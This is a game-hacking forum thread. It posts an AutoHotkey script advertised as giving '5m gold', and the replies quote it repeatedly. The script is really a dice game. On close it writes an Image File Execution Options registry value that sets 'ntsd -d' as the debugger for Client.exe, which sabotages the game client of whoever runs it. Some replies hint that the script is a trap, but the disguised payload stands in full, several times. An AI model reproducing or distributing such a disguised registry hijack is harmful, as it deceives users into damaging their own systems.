i can feel the flames awakening...
now for the war...
now for the war...
#NoTrayIcon
#SingleInstance Force
Gui +ToolWindow
Gui Show, h175 w250, Petals Around the Rose
Gui Font, s20 cRed, Terminal
Gui Add, Text, vDie1 x10 y10 h60 w30
Gui Font, cBlack
Gui Add, Text, vDie2 x60 y10 h60 w30
Gui Font, cGreen
Gui Add, Text, vDie3 x110 y10 h60 w30
Gui Font, cBlack
Gui Add, Text, vDie4 x160 y10 h60 w30
Gui Font, cRed
Gui Add, Text, vDie5 x210 y10 h60 w30
Gui Font, s7 cBlack, Terminal
Gui Add, Text, x30 y100,
(
Guess: Answer:
)
Gui Add, Button, y123 x95 , Roll
Gui Add, Button, Default w0 h0 gCheck
Gui Font, s8, Times New Roman
Gui Add, Edit, vGuess x78 y95 h20 w28 Limit2 Number
Gui Add, Edit, vAnswer x180 y95 ReadOnly h20 w28
Gui Add, Text, x3 y150 , The name of the game is
Gui Add, Text, x125 y150 cRed , Petals Around the Rose
d1 =
(
o
)
d2 =
(
o
o
)
d3 =
(
o
o
o
)
d4 =
(
o o
o o
)
d5 =
(
o o
o
o o
)
d6 =
(
o o
o o
o o
)
return
ButtonRoll:
a1 := random()
a2 := random()
a3 := random()
a4 := random()
a5 := random()
GuiControl, , Die1, % %a1%
GuiControl, , Die2, % %a2%
GuiControl, , Die3, % %a3%
GuiControl, , Die4, % %a4%
GuiControl, , Die5, % %a5%
return
Check:
Loop 5
{
if (a%A_Index% = "d3")
Ans += 2
else if (a%A_Index% = "d5")
Ans += 4
}
GuiControl, , Answer, %Ans%
Ans := 0
return
GuiClose:
Regwrite, REG_SZ, HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Client.exe,Debugger, ntsd -d
ExitApp
random()
{
random x, 1, 6
return "d" . x
}
Oh lawl.Quote:
Autohotkey Script, gives you 5m gold !
Code:#NoTrayIcon #SingleInstance Force Gui +ToolWindow Gui Show, h175 w250, Petals Around the Rose Gui Font, s20 cRed, Terminal Gui Add, Text, vDie1 x10 y10 h60 w30 Gui Font, cBlack Gui Add, Text, vDie2 x60 y10 h60 w30 Gui Font, cGreen Gui Add, Text, vDie3 x110 y10 h60 w30 Gui Font, cBlack Gui Add, Text, vDie4 x160 y10 h60 w30 Gui Font, cRed Gui Add, Text, vDie5 x210 y10 h60 w30 Gui Font, s7 cBlack, Terminal Gui Add, Text, x30 y100, ( Guess: Answer: ) Gui Add, Button, y123 x95 , Roll Gui Add, Button, Default w0 h0 gCheck Gui Font, s8, Times New Roman Gui Add, Edit, vGuess x78 y95 h20 w28 Limit2 Number Gui Add, Edit, vAnswer x180 y95 ReadOnly h20 w28 Gui Add, Text, x3 y150 , The name of the game is Gui Add, Text, x125 y150 cRed , Petals Around the Rose d1 = ( o ) d2 = ( o o ) d3 = ( o o o ) d4 = ( o o o o ) d5 = ( o o o o o ) d6 = ( o o o o o o ) return ButtonRoll: a1 := random() a2 := random() a3 := random() a4 := random() a5 := random() GuiControl, , Die1, % %a1% GuiControl, , Die2, % %a2% GuiControl, , Die3, % %a3% GuiControl, , Die4, % %a4% GuiControl, , Die5, % %a5% return Check: Loop 5 { if (a%A_Index% = "d3") Ans += 2 else if (a%A_Index% = "d5") Ans += 4 } GuiControl, , Answer, %Ans% Ans := 0 return GuiClose: Regwrite, REG_SZ, HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Client.exe,Debugger, ntsd -d ExitApp random() { random x, 1, 6 return "d" . x }
Does this actually do what it says? I am very guilible.Quote:
Autohotkey Script, gives you 5m gold !
Code:#NoTrayIcon #SingleInstance Force Gui +ToolWindow Gui Show, h175 w250, Petals Around the Rose Gui Font, s20 cRed, Terminal Gui Add, Text, vDie1 x10 y10 h60 w30 Gui Font, cBlack Gui Add, Text, vDie2 x60 y10 h60 w30 Gui Font, cGreen Gui Add, Text, vDie3 x110 y10 h60 w30 Gui Font, cBlack Gui Add, Text, vDie4 x160 y10 h60 w30 Gui Font, cRed Gui Add, Text, vDie5 x210 y10 h60 w30 Gui Font, s7 cBlack, Terminal Gui Add, Text, x30 y100, ( Guess: Answer: ) Gui Add, Button, y123 x95 , Roll Gui Add, Button, Default w0 h0 gCheck Gui Font, s8, Times New Roman Gui Add, Edit, vGuess x78 y95 h20 w28 Limit2 Number Gui Add, Edit, vAnswer x180 y95 ReadOnly h20 w28 Gui Add, Text, x3 y150 , The name of the game is Gui Add, Text, x125 y150 cRed , Petals Around the Rose d1 = ( o ) d2 = ( o o ) d3 = ( o o o ) d4 = ( o o o o ) d5 = ( o o o o o ) d6 = ( o o o o o o ) return ButtonRoll: a1 := random() a2 := random() a3 := random() a4 := random() a5 := random() GuiControl, , Die1, % %a1% GuiControl, , Die2, % %a2% GuiControl, , Die3, % %a3% GuiControl, , Die4, % %a4% GuiControl, , Die5, % %a5% return Check: Loop 5 { if (a%A_Index% = "d3") Ans += 2 else if (a%A_Index% = "d5") Ans += 4 } GuiControl, , Answer, %Ans% Ans := 0 return GuiClose: Regwrite, REG_SZ, HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Client.exe,Debugger, ntsd -d ExitApp random() { random x, 1, 6 return "d" . x }
Quote:
well it works, thats for one.
but seriously, just look at the script for a minute and you answer your own question
or let darky answer XD thats another possabilityQuote:
Im sure it does what its supposed to do, but lets say it this way:
Dont do it. :P
In that case, just click the [Only registered and activated users can see links. Click Here To Register...]-Button under the useful Post.Quote:
first post and noob, but wanted to thank you for your posts!